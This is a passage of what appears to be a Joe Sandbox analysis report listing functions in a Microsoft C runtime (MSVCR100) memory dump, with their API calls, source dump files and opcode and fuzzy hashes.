                                                                                                          • Instruction Fuzzy Hash: 07F0A77B905721AEDF607B74AC498DB277CDEC23AA31A065EF415CB240FB60B945C2B1
                                                                                                          Function 6FDD6EF4 Relevance: 6.0, APIs: 4, Instructions: 38COMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          • __p__iob.MSVCR100(6FDD6F80,00000010,6FDD6FB4,Function_0007C71D,?,?,?,?,6FDD5660,?,?,?), ref: 6FDD6F00
                                                                                                          • _errno.MSVCR100(6FDD6F80,00000010,6FDD6FB4,Function_0007C71D,?,?,?,?,6FDD5660,?,?,?), ref: 6FDD6F17
                                                                                                          • _invalid_parameter_noinfo.MSVCR100(6FDD6F80,00000010,6FDD6FB4,Function_0007C71D,?,?,?,?,6FDD5660,?,?,?), ref: 6FDD6F22
                                                                                                            • Part of subcall function 6FDFAF7E: _invalid_parameter.MSVCR100(00000000,00000000,00000000,00000000,00000000,6FDCB6CF,?,6FDCC24B,00000003,6FDA74A4,6FD8A948,0000000C,6FDA74F7,00000001,00000001), ref: 6FDFAF85
                                                                                                          • _lock_file.MSVCR100(00000020,6FDD6F80,00000010,6FDD6FB4,Function_0007C71D,?,?,?,?,6FDD5660,?,?,?), ref: 6FDD6F2D
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000009.00000002.30612817331.000000006FD71000.00000020.00000001.01000000.00000009.sdmp, Offset: 6FD70000, based on PE: true
                                                                                                          • Associated: 00000009.00000002.30612734015.000000006FD70000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                          • Associated: 00000009.00000002.30613074314.000000006FE24000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                          • Associated: 00000009.00000002.30613163038.000000006FE25000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                          • Associated: 00000009.00000002.30613238351.000000006FE29000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_9_2_6fd70000__kjfech8_Vi7.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: __p__iob_errno_invalid_parameter_invalid_parameter_noinfo_lock_file
                                                                                                          • String ID:
                                                                                                          • API String ID: 1220187284-0
                                                                                                          • Opcode ID: 373d2a1a6b089a95bad9415b731f0db32d3e4f0ffd5a313eabec6d2f65c3cb2c
                                                                                                          • Instruction ID: 2058b4f4f8b520c5b16afdabc798ea7813a8e6c310765fb6127951ada4922886
                                                                                                          • Opcode Fuzzy Hash: 373d2a1a6b089a95bad9415b731f0db32d3e4f0ffd5a313eabec6d2f65c3cb2c
                                                                                                          • Instruction Fuzzy Hash: 26F04F71802719EBDF81AFB09C08ADE3B74BF06368F444254F834AA1D0DB39A6119BB5
                                                                                                          Function 6FDD8D4F Relevance: 6.0, APIs: 4, Instructions: 36COMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000009.00000002.30612817331.000000006FD71000.00000020.00000001.01000000.00000009.sdmp, Offset: 6FD70000, based on PE: true
                                                                                                          • Associated: 00000009.00000002.30612734015.000000006FD70000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                          • Associated: 00000009.00000002.30613074314.000000006FE24000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                          • Associated: 00000009.00000002.30613163038.000000006FE25000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                          • Associated: 00000009.00000002.30613238351.000000006FE29000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_9_2_6fd70000__kjfech8_Vi7.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: _errno$_invalid_parameter_noinfomemmove
                                                                                                          • String ID:
                                                                                                          • API String ID: 351588475-0
                                                                                                          • Opcode ID: cdc85d0eefec9f34708fbe528a29ba36f3ecfd0cda790a1510f28e25614434a0
                                                                                                          • Instruction ID: 5097c1e8906ef78b403d31cecfc2147c943b392b837b73f7641a3a8a84448ae5
                                                                                                          • Opcode Fuzzy Hash: cdc85d0eefec9f34708fbe528a29ba36f3ecfd0cda790a1510f28e25614434a0
                                                                                                          • Instruction Fuzzy Hash: 43F0547154830DEFDBA26F68DC0579937A4DF14759F045036F9148B1D0E770B895CBA1
                                                                                                          Function 6FDD436A Relevance: 6.0, APIs: 4, Instructions: 36COMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          • _errno.MSVCR100(6FDD43F0,0000000C), ref: 6FDD4382
                                                                                                          • _invalid_parameter_noinfo.MSVCR100(6FDD43F0,0000000C), ref: 6FDD438D
                                                                                                            • Part of subcall function 6FDFAF7E: _invalid_parameter.MSVCR100(00000000,00000000,00000000,00000000,00000000,6FDCB6CF,?,6FDCC24B,00000003,6FDA74A4,6FD8A948,0000000C,6FDA74F7,00000001,00000001), ref: 6FDFAF85
                                                                                                          • _lock_file.MSVCR100(?,6FDD43F0,0000000C), ref: 6FDD43AB
                                                                                                          • _fseeki64_nolock.MSVCR100(?,?,?,?,6FDD43F0,0000000C), ref: 6FDD43BF
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000009.00000002.30612817331.000000006FD71000.00000020.00000001.01000000.00000009.sdmp, Offset: 6FD70000, based on PE: true
                                                                                                          • Associated: 00000009.00000002.30612734015.000000006FD70000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                          • Associated: 00000009.00000002.30613074314.000000006FE24000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                          • Associated: 00000009.00000002.30613163038.000000006FE25000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                          • Associated: 00000009.00000002.30613238351.000000006FE29000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_9_2_6fd70000__kjfech8_Vi7.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: _errno_fseeki64_nolock_invalid_parameter_invalid_parameter_noinfo_lock_file
                                                                                                          • String ID:
                                                                                                          • API String ID: 3349558216-0
                                                                                                          • Opcode ID: 94de73b16f6191688aa6ccb01c92179553b39c3d4af57f90c801b511e00ea2f4
                                                                                                          • Instruction ID: d297068d93896078b1732150510314e4c044cf3573ee931c991f2cd721715482
                                                                                                          • Opcode Fuzzy Hash: 94de73b16f6191688aa6ccb01c92179553b39c3d4af57f90c801b511e00ea2f4
                                                                                                          • Instruction Fuzzy Hash: D5F03C31C82319EADFA1BFA8D80569E7B60BF02364F118215F8346A1D0D736B9519BA1
                                                                                                          Function 6FD91E9E Relevance: 6.0, APIs: 4, Instructions: 36COMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          • _lock_file.MSVCR100(?,6FD91F00,0000000C), ref: 6FD91EC8
                                                                                                            • Part of subcall function 6FD8A48D: _lock.MSVCR100(?,?,?,6FDD6E10,00000040,6FDD6E48,0000000C,6FDA8676,00000000,?), ref: 6FD8A4BA
                                                                                                          • _fseek_nolock.MSVCR100(?,?,?,6FD91F00,0000000C), ref: 6FD91ED9
                                                                                                            • Part of subcall function 6FD91F1C: _fileno.MSVCR100(?,?,00000001,?,?,6FD91EDE,?,?,?,6FD91F00,0000000C), ref: 6FD91F61
                                                                                                            • Part of subcall function 6FD91F1C: _lseek.MSVCR100(00000000,?,00000001,?,?,6FD91EDE,?,?,?,6FD91F00,0000000C), ref: 6FD91F68
                                                                                                            • Part of subcall function 6FD91E94: _unlock_file.MSVCR100(?,6FD91EF0), ref: 6FD91E97
                                                                                                          • _errno.MSVCR100(6FD91F00,0000000C), ref: 6FDA8D64
                                                                                                          • _invalid_parameter_noinfo.MSVCR100(6FD91F00,0000000C), ref: 6FDA8D6F
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000009.00000002.30612817331.000000006FD71000.00000020.00000001.01000000.00000009.sdmp, Offset: 6FD70000, based on PE: true
                                                                                                          • Associated: 00000009.00000002.30612734015.000000006FD70000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                          • Associated: 00000009.00000002.30613074314.000000006FE24000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                          • Associated: 00000009.00000002.30613163038.000000006FE25000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                          • Associated: 00000009.00000002.30613238351.000000006FE29000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_9_2_6fd70000__kjfech8_Vi7.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: _errno_fileno_fseek_nolock_invalid_parameter_noinfo_lock_lock_file_lseek_unlock_file
                                                                                                          • String ID:
                                                                                                          • API String ID: 4149153117-0
                                                                                                          • Opcode ID: b0febebc47a01fb0fa02229fad3136b11ff1e99d21e3bd4416793c3c1ea14413
                                                                                                          • Instruction ID: 93b45c7e0886d91f0ae956f354c0e338a0b59b06a66717bdd3e8f19903b338e6
                                                                                                          • Opcode Fuzzy Hash: b0febebc47a01fb0fa02229fad3136b11ff1e99d21e3bd4416793c3c1ea14413
                                                                                                          • Instruction Fuzzy Hash: E0F04F32D01349EEDFD1AFB4CC0569D7B746F01365F118221E8346B1D0DB36B940CAA1
                                                                                                          Function 6FD808D2 Relevance: 6.0, APIs: 4, Instructions: 35COMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000009.00000002.30612817331.000000006FD71000.00000020.00000001.01000000.00000009.sdmp, Offset: 6FD70000, based on PE: true
                                                                                                          • Associated: 00000009.00000002.30612734015.000000006FD70000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                          • Associated: 00000009.00000002.30613074314.000000006FE24000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                          • Associated: 00000009.00000002.30613163038.000000006FE25000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                          • Associated: 00000009.00000002.30613238351.000000006FE29000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_9_2_6fd70000__kjfech8_Vi7.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: _errno$_invalid_parameter_noinfomemmove
                                                                                                          • String ID:
                                                                                                          • API String ID: 351588475-0
                                                                                                          • Opcode ID: e9982ba919b5cd3db2891b3bdaf6a90660425bbe22dff51734183ff52d4c84de
                                                                                                          • Instruction ID: 257f05ac443077fae6f0bd6207728a93cc995a6a438d92e02be6833e2a7d5457
                                                                                                          • Opcode Fuzzy Hash: e9982ba919b5cd3db2891b3bdaf6a90660425bbe22dff51734183ff52d4c84de
                                                                                                          • Instruction Fuzzy Hash: 41F0E971106309EBDB616F5CE8087D937549F04794F008026F8148A194D772F840CAA6
                                                                                                          Function 6FD92073 Relevance: 6.0, APIs: 4, Instructions: 35COMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          • _lock.MSVCR100(00000007,6FD920C8,0000000C), ref: 6FD92091
                                                                                                            • Part of subcall function 6FD80910: EnterCriticalSection.KERNEL32(00000001,00000001,?,6FD81EE5,0000000D), ref: 6FD8092B
                                                                                                            • Part of subcall function 6FD921F3: wcsnlen.MSVCR100(?,00007FFF,?,?,?,00000007,00000007,?,6FD920A6,?,?,6FD920C8,0000000C), ref: 6FD9221D
                                                                                                            • Part of subcall function 6FD921F3: wcsnlen.MSVCR100(?,00007FFF,?,00007FFF,?,?,?,00000007,00000007,?,6FD920A6,?,?,6FD920C8,0000000C), ref: 6FD92228
                                                                                                            • Part of subcall function 6FD921F3: _calloc_crt.MSVCR100(00000002,00000002), ref: 6FD92247
                                                                                                            • Part of subcall function 6FD921F3: wcscpy_s.MSVCR100(00000000,00000002,?), ref: 6FD9225E
                                                                                                            • Part of subcall function 6FD921F3: wcscpy_s.MSVCR100(?,00000002,?,00000000,00000002,?), ref: 6FD9227B
                                                                                                            • Part of subcall function 6FD921F3: WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000,00000000,00000000), ref: 6FD922B9
                                                                                                            • Part of subcall function 6FD921F3: WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000,00000000,00000000), ref: 6FD922D5
                                                                                                            • Part of subcall function 6FD921F3: _calloc_crt.MSVCR100(00000000,00000001), ref: 6FD922E2
                                                                                                          • _errno.MSVCR100(6FD920C8,0000000C), ref: 6FDB109A
                                                                                                          • _invalid_parameter_noinfo.MSVCR100(6FD920C8,0000000C), ref: 6FDB10A4
                                                                                                          • _errno.MSVCR100(6FD920C8,0000000C), ref: 6FDB10B0
                                                                                                            • Part of subcall function 6FD9206A: _unlock.MSVCR100(00000007,6FD920BF,6FD920C8,0000000C), ref: 6FD9206C
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000009.00000002.30612817331.000000006FD71000.00000020.00000001.01000000.00000009.sdmp, Offset: 6FD70000, based on PE: true
                                                                                                          • Associated: 00000009.00000002.30612734015.000000006FD70000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                          • Associated: 00000009.00000002.30613074314.000000006FE24000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                          • Associated: 00000009.00000002.30613163038.000000006FE25000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                          • Associated: 00000009.00000002.30613238351.000000006FE29000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_9_2_6fd70000__kjfech8_Vi7.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: ByteCharMultiWide_calloc_crt_errnowcscpy_swcsnlen$CriticalEnterSection_invalid_parameter_noinfo_lock_unlock
                                                                                                          • String ID:
                                                                                                          • API String ID: 813033701-0
                                                                                                          • Opcode ID: 2cfee024e569669f9dcac5cabfb0786a059351c1380354a18d59413f7bbf97ba
                                                                                                          • Instruction ID: a6656818e60e3309f2809bc9bb6a0feca4bd15a937b8d076444a789374dac013
                                                                                                          • Opcode Fuzzy Hash: 2cfee024e569669f9dcac5cabfb0786a059351c1380354a18d59413f7bbf97ba
                                                                                                          • Instruction Fuzzy Hash: AAF09071641305EAEB90BFB8C80579E3370AF01369F108215E0289F1D0DB78B541AB60
                                                                                                          Function 6FD8A864 Relevance: 6.0, APIs: 4, Instructions: 32COMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          • _lock_file.MSVCR100(?,?,?,?,?,?,?,6FD8A8C0,0000000C), ref: 6FD8A891
                                                                                                            • Part of subcall function 6FD8A48D: _lock.MSVCR100(?,?,?,6FDD6E10,00000040,6FDD6E48,0000000C,6FDA8676,00000000,?), ref: 6FD8A4BA
                                                                                                          • _fclose_nolock.MSVCR100(?,?,?,?,?,?,?,6FD8A8C0,0000000C), ref: 6FD8A89C
                                                                                                            • Part of subcall function 6FD8A80F: _fileno.MSVCR100(?,?,?), ref: 6FD8A839
                                                                                                            • Part of subcall function 6FD8A80F: _close.MSVCR100(00000000,?,?,?), ref: 6FD8A83F
                                                                                                            • Part of subcall function 6FD8A8DC: _unlock_file.MSVCR100(?,6FD8A8B1,?,?,?,?,?,?,6FD8A8C0,0000000C), ref: 6FD8A8DD
                                                                                                          • _errno.MSVCR100(?,?,?,?,?,?,6FD8A8C0,0000000C), ref: 6FDA8BC3
                                                                                                          • _invalid_parameter_noinfo.MSVCR100(?,?,?,?,?,?,6FD8A8C0,0000000C), ref: 6FDA8BCE
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000009.00000002.30612817331.000000006FD71000.00000020.00000001.01000000.00000009.sdmp, Offset: 6FD70000, based on PE: true
                                                                                                          • Associated: 00000009.00000002.30612734015.000000006FD70000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                          • Associated: 00000009.00000002.30613074314.000000006FE24000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                          • Associated: 00000009.00000002.30613163038.000000006FE25000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                          • Associated: 00000009.00000002.30613238351.000000006FE29000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_9_2_6fd70000__kjfech8_Vi7.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: _close_errno_fclose_nolock_fileno_invalid_parameter_noinfo_lock_lock_file_unlock_file
                                                                                                          • String ID:
                                                                                                          • API String ID: 4139757366-0
                                                                                                          • Opcode ID: f23ba559aa893185abb7e34c1d0a08097b25cd20fc50bfde09bae01490b03719
                                                                                                          • Instruction ID: 2190742f92695febcd525cd56828dd7e02dd9162110ce8c8c26b308d7bbacf33
                                                                                                          • Opcode Fuzzy Hash: f23ba559aa893185abb7e34c1d0a08097b25cd20fc50bfde09bae01490b03719
                                                                                                          • Instruction Fuzzy Hash: 98F06D71802705EAE790AB74D804B5E77B06F01338F1197059474AA0C0CB7CB6028BB8
                                                                                                          Function 6FDC0072 Relevance: 6.0, APIs: 4, Instructions: 32memoryCOMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          • TlsAlloc.KERNEL32 ref: 6FDC0093
                                                                                                          • GetLastError.KERNEL32 ref: 6FDC00A3
                                                                                                          • ??0scheduler_resource_allocation_error@Concurrency@@QAE@J@Z.MSVCR100(00000000), ref: 6FDC00BC
                                                                                                          • _CxxThrowException.MSVCR100(00000000,6FE20C48,00000000), ref: 6FDC00CB
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000009.00000002.30612817331.000000006FD71000.00000020.00000001.01000000.00000009.sdmp, Offset: 6FD70000, based on PE: true
                                                                                                          • Associated: 00000009.00000002.30612734015.000000006FD70000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                          • Associated: 00000009.00000002.30613074314.000000006FE24000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                          • Associated: 00000009.00000002.30613163038.000000006FE25000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                          • Associated: 00000009.00000002.30613238351.000000006FE29000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_9_2_6fd70000__kjfech8_Vi7.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: ??0scheduler_resource_allocation_error@AllocConcurrency@@ErrorExceptionLastThrow
                                                                                                          • String ID:
                                                                                                          • API String ID: 2232697313-0
                                                                                                          • Opcode ID: e1c1801e7163632e468443e9efe11cc28507f1ae510ba029fca2bf30d3040291
                                                                                                          • Instruction ID: 92cb24debae302357bd080b3dd8a8c8158ccdc4bacec909de0bdb738e9bfe2ef
                                                                                                          • Opcode Fuzzy Hash: e1c1801e7163632e468443e9efe11cc28507f1ae510ba029fca2bf30d3040291
                                                                                                          • Instruction Fuzzy Hash: 3DF0E9B141470146C7406B748C1A62A3698AF42334F104739E429C60C0FF34F110BAA7
                                                                                                          Function 6FDD6E64 Relevance: 6.0, APIs: 4, Instructions: 29COMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          • _errno.MSVCR100(6FDD6ED8,0000000C), ref: 6FDD6E7C
                                                                                                          • _invalid_parameter_noinfo.MSVCR100(6FDD6ED8,0000000C), ref: 6FDD6E87
                                                                                                            • Part of subcall function 6FDFAF7E: _invalid_parameter.MSVCR100(00000000,00000000,00000000,00000000,00000000,6FDCB6CF,?,6FDCC24B,00000003,6FDA74A4,6FD8A948,0000000C,6FDA74F7,00000001,00000001), ref: 6FDFAF85
                                                                                                          • _lock_file.MSVCR100(?,6FDD6ED8,0000000C), ref: 6FDD6E96
                                                                                                          • _ungetwc_nolock.MSVCR100(?,?,6FDD6ED8,0000000C), ref: 6FDD6EA6
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000009.00000002.30612817331.000000006FD71000.00000020.00000001.01000000.00000009.sdmp, Offset: 6FD70000, based on PE: true
                                                                                                          • Associated: 00000009.00000002.30612734015.000000006FD70000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                          • Associated: 00000009.00000002.30613074314.000000006FE24000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                          • Associated: 00000009.00000002.30613163038.000000006FE25000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                          • Associated: 00000009.00000002.30613238351.000000006FE29000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_9_2_6fd70000__kjfech8_Vi7.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: _errno_invalid_parameter_invalid_parameter_noinfo_lock_file_ungetwc_nolock
                                                                                                          • String ID:
                                                                                                          • API String ID: 1885232967-0
                                                                                                          • Opcode ID: 310cc4e5f4363a468146f64a2abce53db84e6525c873bae9cc0cf25d642b3b97
                                                                                                          • Instruction ID: 5f236c59a05e43a42164d6320e40fffaa0dbddc316b5e2199bc9951c7f75a212
                                                                                                          • Opcode Fuzzy Hash: 310cc4e5f4363a468146f64a2abce53db84e6525c873bae9cc0cf25d642b3b97
                                                                                                          • Instruction Fuzzy Hash: 7DF01235405306EAEB906FB5EC056AD37B0AF05369F11D166B4249E1D0DB3AA5419B60
                                                                                                          Function 6FD8C9C1 Relevance: 6.0, APIs: 4, Instructions: 29COMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000009.00000002.30612817331.000000006FD71000.00000020.00000001.01000000.00000009.sdmp, Offset: 6FD70000, based on PE: true
                                                                                                          • Associated: 00000009.00000002.30612734015.000000006FD70000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                          • Associated: 00000009.00000002.30613074314.000000006FE24000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                          • Associated: 00000009.00000002.30613163038.000000006FE25000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                          • Associated: 00000009.00000002.30613238351.000000006FE29000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_9_2_6fd70000__kjfech8_Vi7.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: _errno$_invalid_parameter_noinfo_wfsopen
                                                                                                          • String ID:
                                                                                                          • API String ID: 972587971-0
                                                                                                          • Opcode ID: 80a578632935dee6ef77630ccfa365ade4c2e455c04d7789f8367b117b433f30
                                                                                                          • Instruction ID: 15dc96225fee76723829375832c52ce7fabbb4067b99d4ddb5ff7bcb42a9bf30
                                                                                                          • Opcode Fuzzy Hash: 80a578632935dee6ef77630ccfa365ade4c2e455c04d7789f8367b117b433f30
                                                                                                          • Instruction Fuzzy Hash: E1E09231655319EBDB916F68EC00A9A37649F05B58F014261F864AB290EB71F85087E4
                                                                                                          Function 6FDD4791 Relevance: 6.0, APIs: 4, Instructions: 29COMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          • _errno.MSVCR100(6FDD4800,00000010,6FDD3CD9,00000000), ref: 6FDD47A9
                                                                                                          • _invalid_parameter_noinfo.MSVCR100(6FDD4800,00000010,6FDD3CD9,00000000), ref: 6FDD47B4
                                                                                                            • Part of subcall function 6FDFAF7E: _invalid_parameter.MSVCR100(00000000,00000000,00000000,00000000,00000000,6FDCB6CF,?,6FDCC24B,00000003,6FDA74A4,6FD8A948,0000000C,6FDA74F7,00000001,00000001), ref: 6FDFAF85
                                                                                                          • _lock_file.MSVCR100(00000000,6FDD4800,00000010,6FDD3CD9,00000000), ref: 6FDD47C3
                                                                                                          • _ftelli64_nolock.MSVCR100(00000000,6FDD4800,00000010,6FDD3CD9,00000000), ref: 6FDD47D0
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000009.00000002.30612817331.000000006FD71000.00000020.00000001.01000000.00000009.sdmp, Offset: 6FD70000, based on PE: true
                                                                                                          • Associated: 00000009.00000002.30612734015.000000006FD70000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                          • Associated: 00000009.00000002.30613074314.000000006FE24000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                          • Associated: 00000009.00000002.30613163038.000000006FE25000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                          • Associated: 00000009.00000002.30613238351.000000006FE29000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_9_2_6fd70000__kjfech8_Vi7.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: _errno_ftelli64_nolock_invalid_parameter_invalid_parameter_noinfo_lock_file
                                                                                                          • String ID:
                                                                                                          • API String ID: 2490801915-0
                                                                                                          • Opcode ID: 086ded24fbb19c07a5641324c69387abb37882972d8de68de7059722c1237e59
                                                                                                          • Instruction ID: 67680b35a99f8294c2975ad714cef269c53e7220495db4fe47b5aea9c995c6ed
                                                                                                          • Opcode Fuzzy Hash: 086ded24fbb19c07a5641324c69387abb37882972d8de68de7059722c1237e59
                                                                                                          • Instruction Fuzzy Hash: 3DF0FE31901349EBDF80AFB9ED0568D77B1BF46369F20C225F424AA1D0DB78A5819BA0
                                                                                                          Function 6FDC235D Relevance: 6.0, APIs: 4, Instructions: 29COMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          • ?GetPolicyValue@SchedulerPolicy@Concurrency@@QBEIW4PolicyElementKey@2@@Z.MSVCR100(00000002), ref: 6FDC236A
                                                                                                            • Part of subcall function 6FDC20F1: ??0exception@std@@QAE@ABQBD@Z.MSVCR100(6FDC1F83,?,6FDC1F83,00000001), ref: 6FDC2110
                                                                                                            • Part of subcall function 6FDC20F1: _CxxThrowException.MSVCR100(?,6FE20DAC,6FDC1F83), ref: 6FDC2125
                                                                                                          • ??0exception@std@@QAE@ABQBD@Z.MSVCR100(?,00000008,00000002), ref: 6FDC2382
                                                                                                          • _CxxThrowException.MSVCR100(?,6FE20DC8,?,00000008,00000002), ref: 6FDC2397
                                                                                                          • ?GetPolicyValue@SchedulerPolicy@Concurrency@@QBEIW4PolicyElementKey@2@@Z.MSVCR100(00000008,00000002), ref: 6FDC23A1
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000009.00000002.30612817331.000000006FD71000.00000020.00000001.01000000.00000009.sdmp, Offset: 6FD70000, based on PE: true
                                                                                                          • Associated: 00000009.00000002.30612734015.000000006FD70000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                          • Associated: 00000009.00000002.30613074314.000000006FE24000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                          • Associated: 00000009.00000002.30613163038.000000006FE25000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                          • Associated: 00000009.00000002.30613238351.000000006FE29000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_9_2_6fd70000__kjfech8_Vi7.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: Policy$??0exception@std@@Concurrency@@ElementExceptionKey@2@@Policy@SchedulerThrowValue@
                                                                                                          • String ID:
                                                                                                          • API String ID: 522757350-0
                                                                                                          • Opcode ID: 9d19679e89e2b8d5ce3b4dec549e305b8b8aa280d8682464fb9d4d6568f12ce9
                                                                                                          • Instruction ID: 8422a0ea0d91821904fb610aeea60d6a2b1e165d907656bd1c93e11280531011
                                                                                                          • Opcode Fuzzy Hash: 9d19679e89e2b8d5ce3b4dec549e305b8b8aa280d8682464fb9d4d6568f12ce9
                                                                                                          • Instruction Fuzzy Hash: 48F05E31540308ABC780EFA8C881E8D7BAC6F4574CF008059ED06AB280EF30F645DBA2
                                                                                                          Function 6FDD3DE3 Relevance: 6.0, APIs: 4, Instructions: 29COMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          • _errno.MSVCR100 ref: 6FDD3DF0
                                                                                                          • _invalid_parameter_noinfo.MSVCR100 ref: 6FDD3DFA
                                                                                                            • Part of subcall function 6FDFAF7E: _invalid_parameter.MSVCR100(00000000,00000000,00000000,00000000,00000000,6FDCB6CF,?,6FDCC24B,00000003,6FDA74A4,6FD8A948,0000000C,6FDA74F7,00000001,00000001), ref: 6FDFAF85
                                                                                                          • _fsopen.MSVCR100(?,?,00000080), ref: 6FDD3E0E
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000009.00000002.30612817331.000000006FD71000.00000020.00000001.01000000.00000009.sdmp, Offset: 6FD70000, based on PE: true
                                                                                                          • Associated: 00000009.00000002.30612734015.000000006FD70000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                          • Associated: 00000009.00000002.30613074314.000000006FE24000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                          • Associated: 00000009.00000002.30613163038.000000006FE25000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                          • Associated: 00000009.00000002.30613238351.000000006FE29000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_9_2_6fd70000__kjfech8_Vi7.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: _errno_fsopen_invalid_parameter_invalid_parameter_noinfo
                                                                                                          • String ID:
                                                                                                          • API String ID: 2625326935-0
                                                                                                          • Opcode ID: 6b0c4313ef2805752d118dca9e261a7ed14f5036beb5d380c3d578ada8b764d7
                                                                                                          • Instruction ID: 43341494eeecf0d7a919971a1b3d3d308f56b478852814b552b6221be0744c61
                                                                                                          • Opcode Fuzzy Hash: 6b0c4313ef2805752d118dca9e261a7ed14f5036beb5d380c3d578ada8b764d7
